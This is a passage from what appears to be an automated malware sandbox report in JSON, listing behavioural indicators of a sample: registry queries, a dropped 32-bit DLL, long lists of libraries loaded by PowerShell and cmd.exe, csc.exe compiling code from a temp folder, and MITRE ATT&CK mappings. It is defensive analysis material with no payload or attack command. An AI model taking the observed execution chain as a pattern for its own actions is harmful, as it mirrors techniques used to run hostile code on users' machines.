\"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"bbotlxd5.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002724)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002724)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002724)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002724)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\d254c63bedcb76c81c3125bd527b7d1a\\Microsoft.PowerShell.ConsoleH (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\73a1a80aed03e789a49cec899b7505dd\\System.Management.Automation. (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automatio (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\wintrust.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter wintrust.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\System.DirectoryServices.ni.d (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\amsi.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter amsi.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Data\\df2dd09ed7c341842a104e1e668f184e\\System.Data.ni.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P6f792626#\\05765f777020deeddc8ad54b48343b9c\\Microsoft.PowerShell.Security (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Mf49f6405#\\f0821980bfe2fc8375ccfc37dbe6e9d8\\Microsoft.Management.Infrastr (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Transactions\\3d760b4a3260a41ef84a3fd866780980\\System.Transactions.ni.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Numerics\\e7d6ed984300c7212c6e682c4f730b1e\\System.Numerics.ni.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\shlwapi.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter shlwapi.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.CSharp\\f73f48afb5512225dedaee9c88ac5050\\Microsoft.CSharp.ni.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.M870d558a#\\7ceb6b903321c16b12386a8df1be50f9\\Microsoft.Management.Infrastr (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pae3498d9#\\8dcf1daed985f481eed5cca9d2945c18\\Microsoft.PowerShell.Commands (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Confe64a9051#\\1561b93d6d25c4a9c3e2659ab29a5e73\\System.Configuration.Install. (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\urlmon.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ncrypt.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WINTRUST.DLL (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter USERENV.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\cryptnet.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter cryptnet.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SensApi.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WINHTTP.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter wshtcpip (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter wship6.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter profapi.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter crypt32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter GDI32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P521220ea#\\45d6173bf76d6c7a206f8f41403f947b\\Microsoft.PowerShell.Commands (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\URlmoN (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter URlmoN (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00006096)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006096)\n \"csc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\alink.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorpehost.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005220)\n \"csc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2 (UID: 00000000-00005220)\n \"cvtres.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002728)\n \"cvtres.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00002728)\n \"cvtres.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2 (UID: 00000000-00002728)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" [Source: 00000000-00002724-00000C44-703675520]\n Observed system executable string:\"\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"%TEMP%\\bbotlxd5\\bbotlx\" [Source: 00000000-00006096-00000C44-39962422625], Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:%LOCALAPPDATA%\\Temp\" [Source: 00000000-00005220-00000C44-8879716715]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\wintrust.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\amsi.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"amsi.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\shlwapi.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\urlmon.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\URlmoN\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"csc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"csc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"csc.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"csc.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"csc.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]\n \"csc.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"csc.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll\" - [base:0; Status:c0000135]\n \"csc.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2\" - [base:0; Status:c0000135]\n \"cvtres.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]\n \"cvtres.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-146", "type": 2, "relevance": 1, "name": "Found named pipe like strings", "description": "Found string - \\\\.\\pipe\\PSHost.133836474550592521.6096.DefaultAppDomain.powershell", "origin": "File/Memory", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76150000\n \"powershell.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76150000\n \"csc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76150000\n \"cvtres.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76150000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"cmd.exe\" (Path: 